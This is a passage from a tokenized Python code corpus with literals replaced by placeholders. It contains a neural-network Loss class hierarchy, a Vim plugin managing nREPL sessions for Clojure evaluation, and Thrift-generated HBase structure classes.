hidden = self . __json_hidden__ or [ ] <EOL> modifiers = self . __json_modifiers__ or dict ( ) <EOL> rv = dict ( ) <EOL> for key in public : <EOL> rv [ key ] = getattr ( self , key ) <EOL> for key , modifier in modifiers . items ( ) : <EOL> value = getattr ( self , key ) <EOL> rv [ key ] = modifier ( value , self ) <EOL> for key in hidden : <EOL> rv . pop ( key , None ) <EOL> return rv </s>
<s> from . . import backend as T <EOL> class Loss ( object ) : <EOL> def __init__ ( self , model ) : <EOL> self . model = model <EOL> self . _calc_loss = None <EOL> self . updates = [ ] <EOL> self . _grads = None <EOL> def get_inputs ( self ) : <EOL> inputs = self . model . get_formatted_input ( ) <EOL> return inputs <EOL> def get_updates ( self ) : <EOL> return self . model . get_updates ( ) + self . updates <EOL> def get_activation ( self , ** kwargs ) : <EOL> return self . model . get_activation ( ** kwargs ) <EOL> def get_final_input ( self ) : <EOL> return self . get_inputs ( ) <EOL> def compute_loss ( self , y , ** kwargs ) : <EOL> return self . loss ( self . get_activation ( use_dropout = True , ** kwargs ) , y ) <EOL> def loss ( self , y_pred , y ) : <EOL> if y_pred . is_sequence ( ) : <EOL> return T . mean ( self . sequence_loss ( y_pred , y ) ) <EOL> return self . _loss ( y_pred . get_data ( ) , y ) <EOL> def sequence_loss ( self , y_pred , y ) : <EOL> def step ( y_pred_i , y_i ) : <EOL> return self . _loss ( y_pred_i , y_i ) <EOL> output , self . updates = T . scan ( step , [ y_pred . get_data ( ) , y ] ) <EOL> return output <EOL> def get_parameters ( self ) : <EOL> return self . model . get_parameters ( ) <EOL> def __mul__ ( self , x ) : <EOL> return MulLoss ( self , x ) <EOL> def __rmul__ ( self , x ) : <EOL> return MulLoss ( self , x ) <EOL> def __add__ ( self , x ) : <EOL> return AddLoss ( self , x ) <EOL> def __radd__ ( self , x ) : <EOL> return AddLoss ( self , x ) <EOL> def __sub__ ( self , x ) : <EOL> return SubLoss ( self , x ) <EOL> def __rsub__ ( self , x ) : <EOL> return SubLoss ( self , x ) <EOL> def __div__ ( self , x ) : <EOL> return DivLoss ( self , x ) <EOL> def __rdiv__ ( self , x ) : <EOL> return DivLoss ( self , x ) <EOL> def __str__ ( self ) : <EOL> return self . __class__ . __name__ <EOL> class ArithmeticLoss ( Loss ) : <EOL> def __init__ ( self , left , right ) : <EOL> self . left , self . right = left , right <EOL> self . _calc_loss = None <EOL> def get_activation ( self , ** kwargs ) : <EOL> return self . left . get_activation ( ** kwargs ) <EOL> def get_updates ( self ) : <EOL> updates = self . left . get_updates ( ) <EOL> if isinstance ( self . right , Loss ) : <EOL> for update in self . right . get_updates ( ) : <EOL> if update not in updates : <EOL> updates . append ( update ) <EOL> return updates <EOL> def get_inputs ( self ) : <EOL> inputs = self . left . get_inputs ( ) <EOL> if isinstance ( self . right , Loss ) : <EOL> for update in self . right . get_inputs ( ) : <EOL> if update not in inputs : <EOL> inputs . append ( update ) <EOL> return inputs <EOL> def get_parameters ( self ) : <EOL> parameters = self . left . get_parameters ( ) <EOL> if isinstance ( self . right , Loss ) : <EOL> for parameter in self . right . get_parameters ( ) : <EOL> if parameter not in parameters : <EOL> parameters . append ( parameter ) <EOL> return parameters <EOL> def compute_loss ( self , y , ** kwargs ) : <EOL> left = self . left . compute_loss ( y , ** kwargs ) <EOL> if isinstance ( self . right , Loss ) : <EOL> right = self . right . compute_loss ( y , ** kwargs ) <EOL> else : <EOL> right = self . right <EOL> return self . op ( left , right ) <EOL> def op ( self , x , y ) : <EOL> raise NotImplementedError <EOL> def __str__ ( self ) : <EOL> return "<STR_LIT>" % ( self . left , self . op_str , self . right ) <EOL> class MulLoss ( ArithmeticLoss ) : <EOL> op_str = '<STR_LIT:*>' <EOL> def op ( self , x , y ) : <EOL> return x * y <EOL> class DivLoss ( ArithmeticLoss ) : <EOL> op_str = '<STR_LIT:/>' <EOL> def op ( self , x , y ) : <EOL> return x / y <EOL> class AddLoss ( ArithmeticLoss ) : <EOL> op_str = '<STR_LIT:+>' <EOL> def op ( self , x , y ) : <EOL> return x + y <EOL> class SubLoss ( ArithmeticLoss ) : <EOL> op_str = '<STR_LIT:->' <EOL> def op ( self , x , y ) : <EOL> return x - y </s>
<s> from . data import * <EOL> from . lstm import * <EOL> from . generate import * </s>
<s> import vim <EOL> import sys <EOL> import os . path <EOL> import nrepl <EOL> from urlparse import urlparse <EOL> nrepl_connections = { } <EOL> def detect_project_repl_port ( ) : <EOL> port_files = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> for pf in port_files : <EOL> if os . path . exists ( pf ) : <EOL> with open ( pf , '<STR_LIT:r>' ) as f : <EOL> return int ( f . read ( ) . strip ( ) ) <EOL> def split_session_url ( url ) : <EOL> components = urlparse ( url ) <EOL> host_port = components . netloc . split ( '<STR_LIT::>' ) <EOL> if len ( host_port ) < <NUM_LIT:2> : <EOL> raise Exception ( '<STR_LIT>' % ( url ) ) <EOL> return components . scheme , host_port [ <NUM_LIT:0> ] , int ( host_port [ <NUM_LIT:1> ] ) , components . path [ <NUM_LIT:1> : ] <EOL> def join_session_url ( components ) : <EOL> return "<STR_LIT>" % components <EOL> def get_sessions ( connections ) : <EOL> for ( scheme , host , port ) , ( conn , sess_list ) in connections . iteritems ( ) : <EOL> for session in sess_list : <EOL> yield join_session_url ( ( scheme , host , port , session ) ) <EOL> def get_buffer_map ( ) : <EOL> result = { } <EOL> for buf in vim . buffers : <EOL> session_url = buf . vars . get ( '<STR_LIT>' ) <EOL> if session_url : <EOL> result . setdefault ( session_url , [ ] ) . append ( buf . name ) <EOL> return result <EOL> def create_session ( scheme , host , port ) : <EOL> conn , sess_list = nrepl_connections . get ( ( scheme , host , port ) , ( None , None ) ) <EOL> if not conn : <EOL> conn = nrepl . connect ( port , host , scheme ) <EOL> sess_list = set ( ) <EOL> nrepl_connections [ ( scheme , host , port ) ] = ( conn , sess_list ) <EOL> session = nrepl . open_session ( conn ) <EOL> sess_list . add ( session ) <EOL> return conn , session <EOL> def project_repl ( ) : <EOL> port = detect_project_repl_port ( ) <EOL> if port : <EOL> conn , session = create_session ( '<STR_LIT>' , '<STR_LIT:localhost>' , port ) <EOL> return conn , session , join_session_url ( ( '<STR_LIT>' , '<STR_LIT:localhost>' , port , session ) ) <EOL> return None , None , None <EOL> def find_session ( url ) : <EOL> scheme , host , port , session = split_session_url ( url ) <EOL> conn , sess_list = nrepl_connections . get ( ( scheme , host , port ) , ( None , None ) ) <EOL> if conn and session in sess_list : <EOL> return conn , session <EOL> return None , None <EOL> def session_exists ( scheme , host , port , session ) : <EOL> conn , sess_list = nrepl_connections . get ( ( scheme , host , port ) , ( None , None ) ) <EOL> return conn and session in sess_list <EOL> def close_session ( url ) : <EOL> scheme , host , port , session = split_session_url ( url ) <EOL> if session : <EOL> conn , sess_list = nrepl_connections . get ( ( scheme , host , port ) , ( None , None ) ) <EOL> if conn : <EOL> nrepl . close_session ( conn , session ) <EOL> sess_list . remove ( session ) <EOL> if not len ( sess_list ) : <EOL> nrepl . disconnect ( conn ) <EOL> del nrepl_connections [ ( scheme , host , port ) ] <EOL> def is_our_buffer ( buf ) : <EOL> return buf . name . endswith ( '<STR_LIT>' ) <EOL> def find_our_bufffer ( ) : <EOL> for b in vim . buffers : <EOL> if is_our_buffer ( b ) : <EOL> return b <EOL> def find_our_window ( ) : <EOL> for w in vim . windows : <EOL> if is_our_buffer ( w . buffer ) : <EOL> return w . number <EOL> def remove_trailing_new_line ( subject ) : <EOL> if subject and subject [ - <NUM_LIT:1> ] == '<STR_LIT:\n>' : <EOL> return subject [ : - <NUM_LIT:1> ] <EOL> return subject <EOL> def output_data ( data , target = sys . stdout ) : <EOL> b = find_our_bufffer ( ) <EOL> if b : <EOL> b . append ( remove_trailing_new_line ( data ) . split ( '<STR_LIT:\n>' ) ) <EOL> else : <EOL> print >> target , data <EOL> def scroll_to_end ( buf ) : <EOL> win_num = find_our_window ( ) <EOL> if win_num : <EOL> vim . command ( str ( win_num ) + '<STR_LIT>' ) <EOL> vim . command ( '<STR_LIT>' ) <EOL> vim . command ( '<STR_LIT>' ) <EOL> def response_completed ( ) : <EOL> buf = find_our_bufffer ( ) <EOL> if buf : <EOL> buf . append ( '<STR_LIT:;>' + <NUM_LIT:15> * '<STR_LIT:=>' ) <EOL> scroll_to_end ( buf ) <EOL> def print_response ( response ) : <EOL> for msg in response : <EOL> if '<STR_LIT>' in msg : <EOL> output_data ( msg [ '<STR_LIT>' ] ) <EOL> if '<STR_LIT>' in msg : <EOL> output_data ( msg [ '<STR_LIT>' ] , sys . stderr ) <EOL> if '<STR_LIT:value>' in msg : <EOL> output_data ( msg [ '<STR_LIT:value>' ] ) <EOL> response_completed ( ) <EOL> def attach_session_url ( buf , session_url ) : <EOL> buf . vars [ '<STR_LIT>' ] = session_url <EOL> vim . command ( '<STR_LIT>' % ( buf . number ) ) <EOL> def set_buffer_session ( url ) : <EOL> if url : <EOL> scheme , host , port , session = split_session_url ( url ) <EOL> if session : <EOL> if not session_exists ( scheme , host , port , session ) : <EOL> print >> sys . stderr , '<STR_LIT>' % ( url ) <EOL> return <EOL> else : <EOL> c , session = create_session ( scheme , host , port ) <EOL> attach_session_url ( vim . current . buffer , <EOL> join_session_url ( ( scheme , host , port , session ) ) ) <EOL> print vim . current . buffer . vars . get ( '<STR_LIT>' ) <EOL> def print_sessions ( ) : <EOL> buf_map = get_buffer_map ( ) <EOL> for session_url in get_sessions ( nrepl_connections ) : <EOL> buf_names = buf_map . get ( session_url , [ ] ) <EOL> print session_url , '<STR_LIT:U+002CU+0020>' . join ( buf_names ) <EOL> def collect_garbage ( ) : <EOL> buf_map = get_buffer_map ( ) <EOL> for session_url in list ( get_sessions ( nrepl_connections ) ) : <EOL> if not session_url in buf_map : <EOL> close_session ( session_url ) <EOL> print '<STR_LIT>' , session_url <EOL> def clear_buffer_session ( buf ) : <EOL> vars = vim . current . buffer . vars <EOL> if buf : <EOL> vars = vim . buffers [ int ( buf ) ] . vars <EOL> url = vars . get ( '<STR_LIT>' ) <EOL> if url : <EOL> del vars [ '<STR_LIT>' ] <EOL> collect_garbage ( ) <EOL> def eval ( code , first , last ) : <EOL> conn , session = None , None <EOL> session_url = vim . current . buffer . vars . get ( '<STR_LIT>' ) <EOL> if not session_url : <EOL> conn , session , session_url = project_repl ( ) <EOL> if conn : <EOL> attach_session_url ( vim . current . buffer , session_url ) <EOL> else : <EOL> print >> sys . stderr , '<STR_LIT>' <EOL> else : <EOL> conn , session = find_session ( session_url ) <EOL> if not conn : <EOL> print >> sys . stderr , '<STR_LIT>' % ( session_url ) <EOL> if conn : <EOL> if code : <EOL> print_response ( nrepl . eval ( conn , code , session ) ) <EOL> else : <EOL> path = vim . eval ( "<STR_LIT>" ) <EOL> code = '<STR_LIT:\n>' . join ( vim . current . buffer [ first - <NUM_LIT:1> : last ] ) <EOL> print_response ( nrepl . eval ( conn , code , session , path = path , line = first ) ) </s>
<s> from thrift . Thrift import * <EOL> from thrift . transport import TTransport <EOL> from thrift . protocol import TBinaryProtocol <EOL> try : <EOL> from thrift . protocol import fastbinary <EOL> except : <EOL> fastbinary = None <EOL> class TCell : <EOL> """<STR_LIT>""" <EOL> thrift_spec = ( <EOL> None , <EOL> ( <NUM_LIT:1> , TType . STRING , '<STR_LIT:value>' , None , None , ) , <EOL> ( <NUM_LIT:2> , TType . I64 , '<STR_LIT>' , None , None , ) , <EOL> ) <EOL> def __init__ ( self , value = None , timestamp = None , ) : <EOL> self . value = value <EOL> self . timestamp = timestamp <EOL> def read ( self , iprot ) : <EOL> if iprot . __class__ == TBinaryProtocol . TBinaryProtocolAccelerated and isinstance ( iprot . trans , TTransport . CReadableTransport ) and self . thrift_spec is not None and fastbinary is not None : <EOL> fastbinary . decode_binary ( self , iprot . trans , ( self . __class__ , self . thrift_spec ) ) <EOL> return <EOL> iprot . readStructBegin ( ) <EOL> while True : <EOL> ( fname , ftype , fid ) = iprot . readFieldBegin ( ) <EOL> if ftype == TType . STOP : <EOL> break <EOL> if fid == <NUM_LIT:1> : <EOL> if ftype == TType . STRING : <EOL> self . value = iprot . readString ( ) ; <EOL> else : <EOL> iprot . skip ( ftype ) <EOL> elif fid == <NUM_LIT:2> : <EOL> if ftype == TType . I64 : <EOL> self . timestamp = iprot . readI64 ( ) ; <EOL> else : <EOL> iprot . skip ( ftype ) <EOL> else : <EOL> iprot . skip ( ftype ) <EOL> iprot . readFieldEnd ( ) <EOL> iprot . readStructEnd ( ) <EOL> def write ( self , oprot ) : <EOL> if oprot . __class__ == TBinaryProtocol . TBinaryProtocolAccelerated and self . thrift_spec is not None and fastbinary is not None : <EOL> oprot . trans . write ( fastbinary . encode_binary ( self , ( self . __class__ , self . thrift_spec ) ) ) <EOL> return <EOL> oprot . writeStructBegin ( '<STR_LIT>' ) <EOL> if self . value != None : <EOL> oprot . writeFieldBegin ( '<STR_LIT:value>' , TType . STRING , <NUM_LIT:1> ) <EOL> oprot . writeString ( self . value ) <EOL> oprot . writeFieldEnd ( ) <EOL> if self . timestamp != None : <EOL> oprot . writeFieldBegin ( '<STR_LIT>' , TType . I64 , <NUM_LIT:2> ) <EOL> oprot . writeI64 ( self . timestamp ) <EOL> oprot . writeFieldEnd ( ) <EOL> oprot . writeFieldStop ( ) <EOL> oprot . writeStructEnd ( ) <EOL> def __repr__ ( self ) : <EOL> L = [ '<STR_LIT>' % ( key , value ) <EOL> for key , value in self . __dict__ . iteritems ( ) ] <EOL> return '<STR_LIT>' % ( self . __class__ . __name__ , '<STR_LIT:U+002CU+0020>' . join ( L ) ) <EOL> def __eq__ ( self , other ) : <EOL> return isinstance ( other , self . __class__ ) and self . __dict__ == other . __dict__ <EOL> def __ne__ ( self , other ) : <EOL> return not ( self == other ) <EOL> class ColumnDescriptor : <EOL> """<STR_LIT>""" <EOL> thrift_spec = ( <EOL> None , <EOL> ( <NUM_LIT:1> , TType . STRING , '<STR_LIT:name>' , None , None , ) , <EOL> ( <NUM_LIT:2> , TType . I32 , '<STR_LIT>' , None , <NUM_LIT:3> , ) , <EOL> ( <NUM_LIT:3> , TType . STRING , '<STR_LIT>' , None , "<STR_LIT>" , ) , <EOL> ( <NUM_LIT:4> , TType . BOOL , '<STR_LIT>' , None , False , ) , <EOL> ( <NUM_LIT:5> , TType . I32 , '<STR_LIT>' , None , <NUM_LIT> , ) , <EOL> ( <NUM_LIT:6> , TType . STRING , '<STR_LIT>' , None , "<STR_LIT>" , ) , <EOL> ( <NUM_LIT:7> , TType . I32 , '<STR_LIT>' , None , <NUM_LIT:0> , ) , <EOL> ( <NUM_LIT:8> , TType . I32 , '<STR_LIT>' , None , <NUM_LIT:0> , ) , <EOL> ( <NUM_LIT:9> , TType . BOOL , '<STR_LIT>' , None , False , ) , <EOL> ( <NUM_LIT:10> , TType . I32 , '<STR_LIT>' , None , - <NUM_LIT:1> , ) , <EOL> ) <EOL> def __init__ ( self , name = None , maxVersions = thrift_spec [ <NUM_LIT:2> ] [ <NUM_LIT:4> ] , compression = thrift_spec [ <NUM_LIT:3> ] [ <NUM_LIT:4> ] , inMemory = thrift_spec [ <NUM_LIT:4> ] [ <NUM_LIT:4> ] , maxValueLength = thrift_spec [ <NUM_LIT:5> ] [ <NUM_LIT:4> ] , bloomFilterType = thrift_spec [ <NUM_LIT:6> ] [ <NUM_LIT:4> ] , bloomFilterVectorSize = thrift_spec [ <NUM_LIT:7> ] [ <NUM_LIT:4> ] , bloomFilterNbHashes = thrift_spec [ <NUM_LIT:8> ] [ <NUM_LIT:4> ] , blockCacheEnabled = thrift_spec [ <NUM_LIT:9> ] [ <NUM_LIT:4> ] , timeToLive = thrift_spec [ <NUM_LIT:10> ] [ <NUM_LIT:4> ] , ) : <EOL> self . name = name <EOL> self . maxVersions = maxVersions <EOL> self . compression = compression <EOL> self . inMemory = inMemory <EOL> self . maxValueLength = maxValueLength <EOL> self . bloomFilterType = bloomFilterType <EOL> self . bloomFilterVectorSize = bloomFilterVectorSize <EOL> self . bloomFilterNbHashes = bloomFilterNbHashes <EOL> self . blockCacheEnabled = blockCacheEnabled <EOL> self . timeToLive = timeToLive <EOL> def read ( self , iprot ) : <EOL> if iprot . __class__ == TBinaryProtocol . TBinaryProtocolAccelerated and isinstance ( iprot . trans , TTransport . CReadableTransport ) and self . thrift_spec is not None and fastbinary is not None : <EOL> fastbinary . decode_binary ( self , iprot . trans , ( self . __class__ , self . thrift_spec ) ) <EOL> return <EOL> iprot . readStructBegin ( ) <EOL> while True : <EOL> ( fname , ftype , fid ) = iprot . readFieldBegin ( ) <EOL> if ftype == TType . STOP : <EOL> break <EOL> if fid == <NUM_LIT:1> : <EOL> if ftype == TType . STRING : <EOL> self . name = iprot . readString ( ) ; <EOL> else : <EOL> iprot . skip ( ftype ) <EOL> elif fid == <NUM_LIT:2> : <EOL> if ftype == TType . I32 : <EOL> self . maxVersions = iprot . readI32 ( ) ; <EOL> else : <EOL> iprot . skip ( ftype ) <EOL> elif fid == <NUM_LIT:3> : <EOL> if ftype == TType . STRING : <EOL> self . compression = iprot . readString ( ) ; <EOL> else : <EOL> iprot . skip ( ftype ) <EOL> elif fid == <NUM_LIT:4> : <EOL> if ftype == TType . BOOL : <EOL> self . inMemory = iprot . readBool ( ) ; <EOL> else : <EOL> iprot . skip ( ftype ) <EOL> elif fid == <NUM_LIT:5> : <EOL> if ftype == TType . I32 : <EOL> self . maxValueLength = iprot . readI32 ( ) ; <EOL> else : <EOL> iprot . skip ( ftype ) <EOL> elif fid == <NUM_LIT:6> : <EOL> if ftype == TType . STRING : <EOL> self . bloomFilterType = iprot . readString ( ) ; <EOL> else : <EOL> iprot . skip ( ftype ) <EOL> elif fid == <NUM_LIT:7> : <EOL> if ftype == TType . I32 : <EOL> self . bloomFilterVectorSize = iprot . readI32 ( ) ; <EOL> else : <EOL> iprot . skip ( ftype ) <EOL> elif fid == <NUM_LIT:8> : <EOL> if ftype == TType . I32 : <EOL> self . bloomFilterNbHashes = iprot . readI32 ( ) ; <EOL> else : <EOL> iprot . skip ( ftype ) <EOL> elif fid == <NUM_LIT:9> : <EOL> if ftype == TType . BOOL : <EOL> self . blockCacheEnabled = iprot . readBool ( ) ; <EOL> else : <EOL> iprot . skip ( ftype ) <EOL> elif fid == <NUM_LIT:10> : <EOL> if ftype == TType . I32 : <EOL> self . timeToLive = iprot . readI32 ( ) ; <EOL> else : <EOL> iprot . skip ( ftype ) <EOL> else : <EOL> iprot . skip ( ftype ) <EOL> iprot . readFieldEnd ( ) <EOL> iprot . readStructEnd ( ) <EOL> def write ( self , oprot ) : <EOL> if oprot . __class__ == TBinaryProtocol . TBinaryProtocolAccelerated and self . thrift_spec is not None and fastbinary is not None : <EOL> oprot . trans . write ( fastbinary . encode_binary ( self , ( self . __class__ , self . thrift_spec ) ) ) <EOL> return <EOL> oprot . writeStructBegin ( '<STR_LIT>' ) <EOL> if self . name != None : <EOL> oprot . writeFieldBegin ( '<STR_LIT:name>' , TType . STRING , <NUM_LIT:1> ) <EOL> oprot . writeString ( self . name ) <EOL> oprot . writeFieldEnd ( ) <EOL> if self . maxVersions != None : <EOL> oprot . writeFieldBegin ( '<STR_LIT>' , TType . I32 , <NUM_LIT:2> ) <EOL> oprot . writeI32 ( self . maxVersions ) <EOL> oprot . writeFieldEnd ( ) <EOL> if self . compression != None : <EOL> oprot . writeFieldBegin ( '<STR_LIT>' , TType . STRING , <NUM_LIT:3> ) <EOL> oprot . writeString ( self . compression ) <EOL> oprot . writeFieldEnd ( ) <EOL> if self . inMemory != None : <EOL> oprot . writeFieldBegin ( '<STR_LIT>' , TType . BOOL , <NUM_LIT:4> ) <EOL> oprot . writeBool ( self . inMemory ) <EOL> oprot . writeFieldEnd ( ) <EOL> if self . maxValueLength != None : <EOL> oprot . writeFieldBegin ( '<STR_LIT>' , TType . I32 , <NUM_LIT:5> ) <EOL> oprot . writeI32 ( self . maxValueLength ) <EOL> oprot . writeFieldEnd ( ) <EOL> if self . bloomFilterType != None : <EOL> oprot . writeFieldBegin ( '<STR_LIT>' , TType . STRING , <NUM_LIT:6> ) <EOL> oprot . writeString ( self . bloomFilterType ) <EOL> oprot . writeFieldEnd ( ) <EOL> if self . bloomFilterVectorSize != None : <EOL> oprot . writeFieldBegin ( '<STR_LIT>' , TType . I32 , <NUM_LIT:7> ) <EOL> oprot . writeI32 ( self . bloomFilterVectorSize ) <EOL> oprot . writeFieldEnd ( ) <EOL> if self . bloomFilterNbHashes != None : <EOL> oprot . writeFieldBegin ( '<STR_LIT>' , TType . I32 , <NUM_LIT:8> ) <EOL> oprot . writeI32 ( self . bloomFilterNbHashes ) <EOL> oprot . writeFieldEnd ( ) <EOL> if self . blockCacheEnabled != None : <EOL> oprot . writeFieldBegin ( '<STR_LIT>' , TType . BOOL , <NUM_LIT:9> ) <EOL> oprot . writeBool ( self . blockCacheEnabled ) <EOL> oprot . writeFieldEnd ( ) <EOL> if self . timeToLive != None : <EOL> oprot . writeFieldBegin ( '<STR_LIT>' , TType . I32 , <NUM_LIT:10> ) <EOL> oprot . writeI32 ( self . timeToLive ) <EOL> oprot . writeFieldEnd ( ) <EOL> oprot . writeFieldStop ( ) <EOL> oprot . writeStructEnd ( ) <EOL> def __repr__ ( self ) : <EOL> L = [ '<STR_LIT>' % ( key , value ) <EOL> for key , value in self . __dict__ . iteritems ( ) ] <EOL> return '<STR_LIT>' % ( self . __class__ . __name__ , '<STR_LIT:U+002CU+0020>' . join ( L ) ) <EOL> def __eq__ ( self , other ) : <EOL> return isinstance ( other , self . __class__ ) and self . __dict__ == other . __dict__ <EOL> def __ne__ ( self , other ) : <EOL> return not ( self == other ) <EOL> class TRegionInfo : <EOL> """<STR_LIT>""" <EOL> thrift_spec = ( <EOL> None , <EOL> ( <NUM_LIT:1> , TType . STRING , '<STR_LIT>' , None , None , ) , <EOL> ( <NUM_LIT:2> , TType . STRING , '<STR_LIT>' , None , None , ) , <EOL> ( <NUM_LIT:3> , TType . I64 , '<STR_LIT:id>' , None , None , ) , <EOL> ( <NUM_LIT:4> , TType . STRING , '<STR_LIT:name>' , None , None , ) , <EOL> ( <NUM_LIT:5> , TType . BYTE , '<STR_LIT:version>' , None , None , ) , <EOL> ) <EOL> def __init__ ( self , startKey = None , endKey = None , id = None , name = None , version = None , ) : <EOL> self . startKey = startKey <EOL> self . endKey = endKey <EOL> self . id = id <EOL> self . name = name <EOL> self . version = version <EOL> def read ( self , iprot ) : <EOL> if iprot . __class__ == TBinaryProtocol . TBinaryProtocolAccelerated and isinstance ( iprot . trans , TTransport . CReadableTransport ) and self . thrift_spec is not None and fastbinary is not None : <EOL> fastbinary . decode_binary ( self , iprot . trans , ( self . __class__ , self . thrift_spec ) ) <EOL> return <EOL> iprot . readStructBegin ( ) <EOL> while True : <EOL> ( fname , ftype , fid ) = iprot . readFieldBegin ( ) <EOL> if ftype == TType . STOP : <EOL> break <EOL> if fid == <NUM_LIT:1> : <EOL> if ftype == TType . STRING : <EOL> self . startKey = iprot . readString ( ) ; <EOL> else : <EOL> iprot . skip ( ftype ) <EOL> elif fid == <NUM_LIT:2> : <EOL> if ftype == TType . STRING : <EOL> self . endKey = iprot . readString ( ) ; <EOL> else : <EOL> iprot . skip ( ftype ) <EOL> elif fid == <NUM_LIT:3> : <EOL> if ftype == TType . I64 : <EOL> self . id = iprot . readI64 ( ) ; <EOL> else : <EOL> iprot . skip ( ftype ) <EOL> elif fid == <NUM_LIT:4> : <EOL> if ftype == TType . STRING : <EOL> self . name = iprot . readString ( ) ; <EOL> else : <EOL> iprot . skip ( ftype ) <EOL> elif fid == <NUM_LIT:5> : <EOL> if ftype == TType . BYTE : <EOL> self . version = iprot . readByte ( ) ; <EOL> else : <EOL> iprot . skip ( ftype ) <EOL> else : <EOL> iprot . skip ( ftype ) <EOL> iprot . readFieldEnd ( ) <EOL> iprot . readStructEnd ( ) <EOL> def write ( self , oprot ) : <EOL> if oprot . __class__ == TBinaryProtocol . TBinaryProtocolAccelerated and self . thrift_spec is not None and fastbinary is not None : <EOL> oprot . trans . write ( fastbinary . encode_binary ( self , ( self . __class__ , self . thrift_spec ) ) ) <EOL> return <EOL> oprot . writeStructBegin ( '<STR_LIT>' ) <EOL> if self . startKey != None : <EOL> oprot . writeFieldBegin ( '<STR_LIT>' , TType . STRING , <NUM_LIT:1> ) <EOL> oprot . writeString ( self . startKey ) <EOL> oprot . writeFieldEnd ( ) <EOL> if self . endKey != None : <EOL> oprot . writeFieldBegin ( '<STR_LIT>' , TType . STRING , <NUM_LIT:2> ) <EOL> oprot . writeString ( self . endKey ) <EOL> oprot . writeFieldEnd ( ) <EOL> if self . id != None : <EOL> oprot . writeFieldBegin ( '<STR_LIT:id>' , TType . I64 , <NUM_LIT:3> ) <EOL> oprot . writeI64 ( self . id ) <EOL> oprot . writeFieldEnd ( ) <EOL> if self . name != None : <EOL> oprot . writeFieldBegin ( '<STR_LIT:name>' , TType . STRING , <NUM_LIT:4> ) <EOL> oprot . writeString ( self . name ) <EOL> oprot . writeFieldEnd ( ) <EOL> if self . version != None : <EOL> oprot . writeFieldBegin ( '<STR_LIT:version>' , TType . BYTE , <NUM_LIT:5> ) <EOL> oprot . writeByte ( self . version ) <EOL> oprot . writeFieldEnd ( ) <EOL> oprot . writeFieldStop ( ) <EOL> oprot . writeStructEnd ( ) <EOL> def __repr__ ( self ) : <EOL> L = [ '<STR_LIT>' % ( key , value ) <EOL> for key , value in self . __dict__ . iteritems ( ) ] <EOL> return '<STR_LIT>' % ( self . __class__ . __name__ , '<STR_LIT:U+002CU+0020>' . join ( L ) ) <EOL> def __eq__ ( self , other ) : <EOL> return isinstance ( other , self . __class__ ) and self . __dict__ == other . __dict__ <EOL> def __ne__ ( self , other ) : <EOL> return not ( self == other ) <EOL> class Mutation : <EOL> """<STR_LIT>""" <EOL> thrift_spec = ( <EOL> None , <EOL> ( <NUM_LIT:1> , TType . BOOL , '<STR_LIT>' , None , False , ) , <EOL> ( <NUM_LIT:2> , TType . STRING , '<STR_LIT>' , None , None , ) , <EOL> ( <NUM_LIT:3> , TType . STRING , '<STR_LIT:value>' , None , None , ) , <EOL> ) <EOL> def __init__ ( self , isDelete = thrift_spec [ <NUM_LIT:1> ] [ <NUM_LIT:4> ] , column = None , value = None , ) : <EOL> self . isDelete = isDelete <EOL> self . column = column <EOL> self . value = value <EOL> def read ( self , iprot ) : <EOL> if iprot . __class__ == TBinaryProtocol . TBinaryProtocolAccelerated and isinstance ( iprot . trans , TTransport . CReadableTransport ) and self . thrift_spec is not None and fastbinary is not None : <EOL> fastbinary . decode_binary ( self , iprot . trans , ( self . __class__ , self . thrift_spec ) ) <EOL> return <EOL> iprot . readStructBegin ( ) <EOL> while True : <EOL> ( fname , ftype , fid ) = iprot . readFieldBegin ( ) <EOL> if ftype == TType . STOP : <EOL> break <EOL> if fid == <NUM_LIT:1> : <EOL> if ftype == TType . BOOL : <EOL> self . isDelete = iprot . readBool ( ) ; <EOL> else : <EOL> iprot . skip ( ftype ) <EOL> elif fid == <NUM_LIT:2> : <EOL> if ftype == TType . STRING : <EOL> self . column = iprot . readString ( ) ; <EOL> else : <EOL> iprot . skip ( ftype ) <EOL> elif fid == <NUM_LIT:3> : <EOL> if ftype == TType . STRING : <EOL> self . value = iprot . readString ( ) ; <EOL> else : <EOL> iprot . skip ( ftype ) <EOL> else : <EOL> iprot . skip ( ftype ) <EOL> iprot . readFieldEnd ( ) <EOL> iprot . readStructEnd ( ) <EOL> def write ( self , oprot ) : <EOL> if oprot . __class__ == TBinaryProtocol . TBinaryProtocolAccelerated and self . thrift_spec is not None and fastbinary is not None : <EOL> oprot . trans . write ( fastbinary . encode_binary ( self , ( self . __class__ , self . thrift_spec ) ) ) <EOL> return <EOL> oprot . writeStructBegin ( '<STR_LIT>' ) <EOL> if self . isDelete != None : <EOL> oprot . writeFieldBegin ( '<STR_LIT>' , TType . BOOL , <NUM_LIT:1> ) <EOL> oprot . writeBool ( self . isDelete ) <EOL> oprot . writeFieldEnd ( ) <EOL> if self . column != None : <EOL> oprot . writeFieldBegin ( '<STR_LIT>' , TType . STRING , <NUM_LIT:2> ) <EOL> oprot . writeString ( self . column ) <EOL> oprot . writeFieldEnd ( ) <EOL> if self . value != None : <EOL> oprot . writeFieldBegin ( '<STR_LIT:value>' , TType . STRING , <NUM_LIT:3> ) <EOL> oprot . writeString ( self . value ) <EOL> oprot . writeFieldEnd ( ) <EOL> oprot . writeFieldStop ( ) <EOL> oprot . writeStructEnd ( ) <EOL> def __repr__ ( self ) : <EOL> L = [ '<STR_LIT>' % ( key , value ) <EOL> for key , value in self . __dict__ . iteritems ( ) ] <EOL> return '<STR_LIT>' % ( self . __class__ . __name__ , '<STR_LIT:U+002CU+0020>' . join ( L ) ) <EOL> def __eq__ ( self , other ) : <EOL> return isinstance ( other , self . __class__ ) and self . __dict__ == other . __dict__ <EOL> def __ne__ ( self , other ) : <EOL> return not ( self == other ) <EOL> class BatchMutation : <EOL> """<STR_LIT>""" <EOL> thrift_spec = ( <EOL> None , <EOL> ( <NUM_LIT:1> , TType . STRING , '<STR_LIT>' , None , None , ) , <EOL> ( <NUM_LIT:2> , TType . LIST , '<STR_LIT>' , ( TType . STRUCT , ( Mutation , Mutation . thrift_spec ) ) , None , ) , <EOL> ) <EOL> def __init__ ( self , row = None , mutations = None , ) : <EOL> self . row = row <EOL> self . mutations = mutations <EOL> def read ( self , iprot ) : <EOL> if iprot . __class__ == TBinaryProtocol . TBinaryProtocolAccelerated and isinstance ( iprot . trans , TTransport . CReadableTransport ) and self . thrift_spec is not None and fastbinary is not None : <EOL> fastbinary . decode_binary ( self , iprot . trans , ( self . __class__ , self . thrift_spec ) ) <EOL> return 